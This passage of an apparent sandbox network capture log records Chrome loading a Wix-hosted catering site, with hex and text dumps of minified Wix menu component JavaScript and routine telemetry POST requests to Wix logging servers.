                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC228INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 2c 72 65 71 75 69 72 65 28 22 72 65 61 63 74 2d 64 6f 6d 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 6d 65 6e 75 22 2c 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 44 4f 4d 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_menu",["react","reactDOM"],t):"object"==
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 6d 65 6e 75 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 2c 72 65 71 75 69 72 65 28 22 72 65 61 63 74 2d 64 6f 6d 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 6d 65 6e 75 22 5d 3d 74 28 65 2e 52 65 61 63 74 2c 65 2e 52 65 61 63 74 44 4f 4d 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 7b 33 39 35 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 38 32 30
                                                                                                                                                                                                                        Data Ascii: typeof exports?exports["rb_wixui.thunderbolt_menu"]=t(require("react"),require("react-dom")):e["rb_wixui.thunderbolt_menu"]=t(e.React,e.ReactDOM)}("undefined"!=typeof self?self:this,(function(e,t){return function(){var n={39504:function(e,t,n){var r=n(820
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 5f 5f 6c 61 62 65 6c 22 2c 6c 69 6e 6b 3a 22 53 74 79 6c 61 62 6c 65 42 75 74 74 6f 6e 32 35 34 35 33 35 32 34 31 39 5f 5f 6c 69 6e 6b 22 2c 63 6f 6e 74 61 69 6e 65 72 3a 22 53 74 79 6c 61 62 6c 65 42 75 74 74 6f 6e 32 35 34 35 33 35 32 34 31 39 5f 5f 63 6f 6e 74 61 69 6e 65 72 22 2c 69 63 6f 6e 3a 22 53 74 79 6c 61 62 6c 65 42 75 74 74 6f 6e 32 35 34 35 33 35 32 34 31 39 5f 5f 69 63 6f 6e 22 7d 2c 76 61 72 73 3a 7b 7d 2c 73 74 56 61 72 73 3a 7b 7d 2c 6b 65 79 66 72 61 6d 65 73 3a 7b 7d 2c 6c 61 79 65 72 73 3a 7b 7d 7d 2c 22 22 2c 2d 31 2c 65 2e 69 64 29 7d 2c 39 37 37 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 38 32 30 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 2e 63 72 65 61 74 65 28 22 53 74 79 6c 61 62 6c 65 48
                                                                                                                                                                                                                        Data Ascii: __label",link:"StylableButton2545352419__link",container:"StylableButton2545352419__container",icon:"StylableButton2545352419__icon"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},97798:function(e,t,n){var r=n(82016);e.exports=r.create("StylableH
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 6c 69 67 6e 42 6f 78 22 2c 6c 69 73 74 3a 22 69 74 65 6d 44 65 70 74 68 30 32 32 33 33 33 37 34 39 34 33 5f 5f 6c 69 73 74 22 7d 2c 76 61 72 73 3a 7b 7d 2c 73 74 56 61 72 73 3a 7b 22 63 6f 6c 75 6d 6e 73 2d 63 6f 75 6e 74 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 75 6d 6e 73 41 6d 6f 75 6e 74 29 22 2c 22 68 6f 72 69 7a 6f 6e 74 61 6c 2d 73 70 61 63 69 6e 67 22 3a 22 76 61 72 28 2d 2d 68 6f 72 69 7a 6f 6e 74 61 6c 53 70 61 63 69 6e 67 29 22 2c 22 77 68 69 74 65 2d 73 70 61 63 65 22 3a 22 76 61 72 28 2d 2d 77 68 69 74 65 2d 73 70 61 63 65 29 22 2c 22 69 73 2d 61 6e 69 6d 61 74 65 64 22 3a 22 76 61 72 28 2d 2d 69 73 2d 61 6e 69 6d 61 74 65 64 29 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 2d 62 6f 78 2d 6d 61 78 2d 68 65 69 67 68 74 22 3a 22 76 61 72 28 2d 2d 6d 61 78 2d
                                                                                                                                                                                                                        Data Ascii: lignBox",list:"itemDepth02233374943__list"},vars:{},stVars:{"columns-count":"var(--columnsAmount)","horizontal-spacing":"var(--horizontalSpacing)","white-space":"var(--white-space)","is-animated":"var(--is-animated)","animation-box-max-height":"var(--max-
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 72 6f 6f 74 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 72 6f 6f 74 22 2c 6d 65 6e 75 49 74 65 6d 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 6d 65 6e 75 49 74 65 6d 22 2c 68 65 61 64 69 6e 67 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 68 65 61 64 69 6e 67 22 2c 6c 69 73 74 57 72 61 70 70 65 72 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 6c 69 73 74 57 72 61 70 70 65 72 22 2c 70 61 67 65 57 72 61 70 70 65 72 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 70 61 67 65 57 72 61 70 70 65 72 22 2c 70 61 67 65 53 74 72 65 74 63 68 57 72 61 70 70 65 72 3a 22 73 75 62 6d 65 6e 75 38 31 35 31 39 38 30 39 32 5f 5f 70 61 67 65 53 74 72 65 74 63 68 57 72 61 70 70 65 72 22 2c 63 6f 6e 74 61
                                                                                                                                                                                                                        Data Ascii: root:"submenu815198092__root",menuItem:"submenu815198092__menuItem",heading:"submenu815198092__heading",listWrapper:"submenu815198092__listWrapper",pageWrapper:"submenu815198092__pageWrapper",pageStretchWrapper:"submenu815198092__pageStretchWrapper",conta
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 60 24 7b 65 7d 2d 2d 24 7b 74 7d 60 7d 28 74 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 60 24 7b 65 7d 2d 2d 2d 24 7b 74 7d 2d 24 7b 6e 2e 6c 65 6e 67 74 68 7d 2d 24 7b 6e 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2f 67 6d 2c 22 5f 22 29 7d 60 7d 28 74 2c 6e 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 63 6f 6e 73 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 69 66 28 6e 29 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 65 5b 65 2e 6c 65 6e 67 74 68 5d 3d 6e 3b 65 6c 73 65 20 69
                                                                                                                                                                                                                        Data Ascii: ction(t){return`${e}--${t}`}(t);return function(t,n){return`${e}---${t}-${n.length}-${n.replace(/\s/gm,"_")}`}(t,n.toString())}function s(){const e=[];for(let t=0;t<arguments.length;t++){const n=arguments[t];if(n)if("string"==typeof n)e[e.length]=n;else i
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 3b 76 61 72 20 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6f 2e 72 28 61 29 2c 6f 2e 64 28 61 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 61 7d 7d 29 3b 76 61 72 20 65 3d 6f 28 34 34 38 29 2c 74 3d 6f 2e 6e 28 65 29 2c 6e 3d 6f 28 35 33 32 39 29 2c 72 3d 6f 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 69 3d 31 33 2c 6c 3d 32 37 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                                        Data Ascii: Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})};var a={};return function(){"use strict";o.r(a),o.d(a,{components:function(){return Pa}});var e=o(448),t=o.n(e),n=o(5329),r=o.n(n);const i=13,l=27;function s(e){return t
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 66 28 28 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 68 72 65 66 3a 72 2c 72 6f 6c 65 3a 6f 2c 74 61 72 67 65 74 3a 61 2c 72 65 6c 3a 69 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 3d 22 22 2c 63 68 69 6c 64 72 65 6e 3a 73 2c 6c 69 6e 6b 50 6f 70 75 70 49 64 3a 64 2c 61 6e 63 68 6f 72 44 61 74 61 49 64 3a 70 2c 61 6e 63 68 6f 72 43 6f 6d 70 49 64 3a 62 2c 74 61 62 49 6e 64 65 78 3a 68 2c 64 61 74 61 54 65 73 74 49 64 3a 76 3d 43 2e 72 6f 6f 74 2c 74 69 74 6c 65 3a 66 2c 6f 6e 43 6c 69 63 6b 3a 67 2c 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 3a 77 2c 6f 6e 4d 6f 75 73 65 45 6e 74 65 72 3a 45 2c 6f 6e 4d 6f 75 73 65 4c 65 61 76 65 3a 53 2c 6f 6e 46 6f 63 75 73 3a 78 2c 6f 6e 46 6f 63 75 73 43 61 70 74 75 72 65 3a 6b 2c 6f 6e 42 6c 75 72 43 61 70 74 75 72 65 3a 49 2c
                                                                                                                                                                                                                        Data Ascii: ef(((e,t)=>{const{href:r,role:o,target:a,rel:i,className:l="",children:s,linkPopupId:d,anchorDataId:p,anchorCompId:b,tabIndex:h,dataTestId:v=C.root,title:f,onClick:g,onDoubleClick:w,onMouseEnter:E,onMouseLeave:S,onFocus:x,onFocusCapture:k,onBlurCapture:I,
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 73 65 4c 65 61 76 65 3a 53 2c 72 65 66 3a 74 7d 2c 73 29 7d 29 29 3b 63 6f 6e 73 74 20 53 3d 22 62 75 74 74 6f 6e 43 6f 6e 74 65 6e 74 22 2c 78 3d 22 73 74 79 6c 61 62 6c 65 62 75 74 74 6f 6e 2d 6c 61 62 65 6c 22 2c 6b 3d 22 73 74 79 6c 61 62 6c 65 62 75 74 74 6f 6e 2d 69 63 6f 6e 22 2c 49 3d 7b 6c 65 66 74 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 72 69 67 68 74 3a 22 66 6c 65 78 2d 65 6e 64 22 2c 63 65 6e 74 65 72 3a 22 63 65 6e 74 65 72 22 2c 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 7d 2c 4d 3d 7b 22 66 6c 65 78 2d 73 74 61 72 74 22 3a 22 6c 65 66 74 22 2c 22 66 6c 65 78 2d 65 6e 64 22 3a 22 72 69 67 68 74 22 2c 63 65 6e 74 65 72 3a 22 63 65 6e 74 65 72 22 2c 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e
                                                                                                                                                                                                                        Data Ascii: seLeave:S,ref:t},s)}));const S="buttonContent",x="stylablebutton-label",k="stylablebutton-icon",I={left:"flex-start",right:"flex-end",center:"center","space-between":"space-between"},M={"flex-start":"left","flex-end":"right",center:"center","space-between
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 6e 74 3a 49 3d 21 31 2c 69 73 57 72 61 70 54 65 78 74 3a 4d 3d 21 31 2c 6f 6e 44 62 6c 43 6c 69 63 6b 3a 44 2c 6f 6e 4d 6f 75 73 65 45 6e 74 65 72 3a 52 2c 6f 6e 4d 6f 75 73 65 4c 65 61 76 65 3a 54 2c 6f 6e 46 6f 63 75 73 3a 50 2c 6f 6e 42 6c 75 72 3a 7a 2c 61 72 69 61 41 74 74 72 69 62 75 74 65 73 3a 57 2c 6f 6e 43 6c 69 63 6b 3a 56 2c 70 72 65 76 65 6e 74 4c 69 6e 6b 4e 61 76 69 67 61 74 69 6f 6e 3a 46 7d 3d 65 2c 48 3d 28 65 3d 3e 42 6f 6f 6c 65 61 6e 28 65 26 26 28 65 2e 68 72 65 66 7c 7c 65 2e 6c 69 6e 6b 50 6f 70 75 70 49 64 29 29 29 28 61 29 2c 6a 3d 46 26 26 48 2c 5a 3d 21 6d 26 26 56 7c 7c 6a 2c 55 3d 65 2e 73 65 6d 61 6e 74 69 63 43 6c 61 73 73 4e 61 6d 65 73 7c 7c 4c 2c 4b 3d 6e 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 6e 2e 75 73 65 49 6d
                                                                                                                                                                                                                        Data Ascii: ent:I=!1,isWrapText:M=!1,onDblClick:D,onMouseEnter:R,onMouseLeave:T,onFocus:P,onBlur:z,ariaAttributes:W,onClick:V,preventLinkNavigation:F}=e,H=(e=>Boolean(e&&(e.href||e.linkPopupId)))(a),j=F&&H,Z=!m&&V||j,U=e.semanticClassNames||L,K=n.useRef(null);n.useIm


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        100192.168.2.55003434.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 4488
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC4488OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 73 69 74 65 2d 61 73 73 65 74 73 2d 74 68 75 6e 64 65 72 62 6f 6c 74 2d 66 65 61 74 75 72 65 73 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c 22 73 65 73 73 69
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"site-assets-thunderbolt-features","transactionAction":"START","sessi
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC919INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLgEItdlxhT8fiZX0/6cDQVWWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0IZ8mFOa9iu1ai5wwlVRan5EQfi00LSS7LJu7sdkoLsDA+XBPgduIw9f3/+25EwwsQ==,r6yY0ta7bIKrqK70x072ld/8qvwF9aMqTI6Wby2exq8=,bOnBQDOCjWxRPsoIciwTIayBw6+Rja/+Zn+cVVmnQsttx5qjGrklH80i6FzBrFgZyiGuFnuHuABuJBgUtGE2Hw==
                                                                                                                                                                                                                        x-wix-request-id: 1736517189.1892547921700201700030
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-wix-request-id: 1736517189.1892547921700201700030
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        101192.168.2.5500353.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC621OUTPOST / HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 385
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC385OUTData Raw: 7b 22 64 74 22 3a 31 37 37 32 31 2c 22 65 22 3a 5b 7b 22 64 74 22 3a 31 36 33 37 34 2c 22 66 22 3a 7b 22 5f 62 72 61 6e 64 49 64 22 3a 22 77 69 78 22 2c 22 5f 6d 73 22 3a 33 33 30 35 35 2c 22 5f 68 6f 73 74 69 6e 67 50 6c 61 74 66 6f 72 6d 22 3a 22 56 49 45 57 45 52 22 2c 22 73 72 63 22 3a 37 32 2c 22 65 76 69 64 22 3a 31 38 33 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 36 30 39 66 30 34 34 31 2d 32 64 38 63 2d 34 36 34 36 2d 38 34 36 65 2d 32 37 38 62 35 34 61 38 66 35 31 39 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 76 73 69 22 3a 22 34 64 36 66 38 38 39 61 2d 64 37 35 64 2d 34 32 31 36 2d 61
                                                                                                                                                                                                                        Data Ascii: {"dt":17721,"e":[{"dt":16374,"f":{"_brandId":"wix","_ms":33055,"_hostingPlatform":"VIEWER","src":72,"evid":183,"platform":"viewer","sessionId":"609f0441-2d8c-4646-846e-278b54a8f519","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","vsi":"4d6f889a-d75d-4216-a
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        102192.168.2.5500363.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC638OUTPOST /bolt-performance HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 1548
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1548OUTData Raw: 7b 22 64 74 22 3a 32 38 37 38 38 2c 22 65 22 3a 5b 7b 22 64 74 22 3a 32 37 36 31 33 2c 22 66 22 3a 7b 22 74 73 22 3a 33 31 36 38 38 2c 22 74 73 6e 22 3a 33 33 32 33 30 2c 22 70 76 22 3a 66 61 6c 73 65 2c 22 5f 62 72 61 6e 64 49 64 22 3a 22 77 69 78 22 2c 22 5f 6d 73 22 3a 33 33 32 33 30 2c 22 5f 68 6f 73 74 69 6e 67 50 6c 61 74 66 6f 72 6d 22 3a 22 56 49 45 57 45 52 22 2c 22 61 70 70 4e 61 6d 65 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 72 72 49 64 22 3a 22 39 30 31 39 35 34 35 61 2d 37 63 65 66 2d 34 32 64 30 2d 62 31 35 61 2d 37 65 36 61 38 62 62 64 66 38 31 39 22 2c 22 69 73 5f 72 6f 6c 6c 6f 75 74 22 3a 31 2c 22 69 73 53 75 63 63 65 73 73 66 75 6c 53 53 52 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 22 73 73 72 49 6e 74 65 72 6e 61 6c 43
                                                                                                                                                                                                                        Data Ascii: {"dt":28788,"e":[{"dt":27613,"f":{"ts":31688,"tsn":33230,"pv":false,"_brandId":"wix","_ms":33230,"_hostingPlatform":"VIEWER","appName":"thunderbolt","corrId":"9019545a-7cef-42d0-b15a-7e6a8bbdf819","is_rollout":1,"isSuccessfulSSR":true,"name":"ssrInternalC
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        103192.168.2.5500383.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC621OUTPOST / HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 927
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
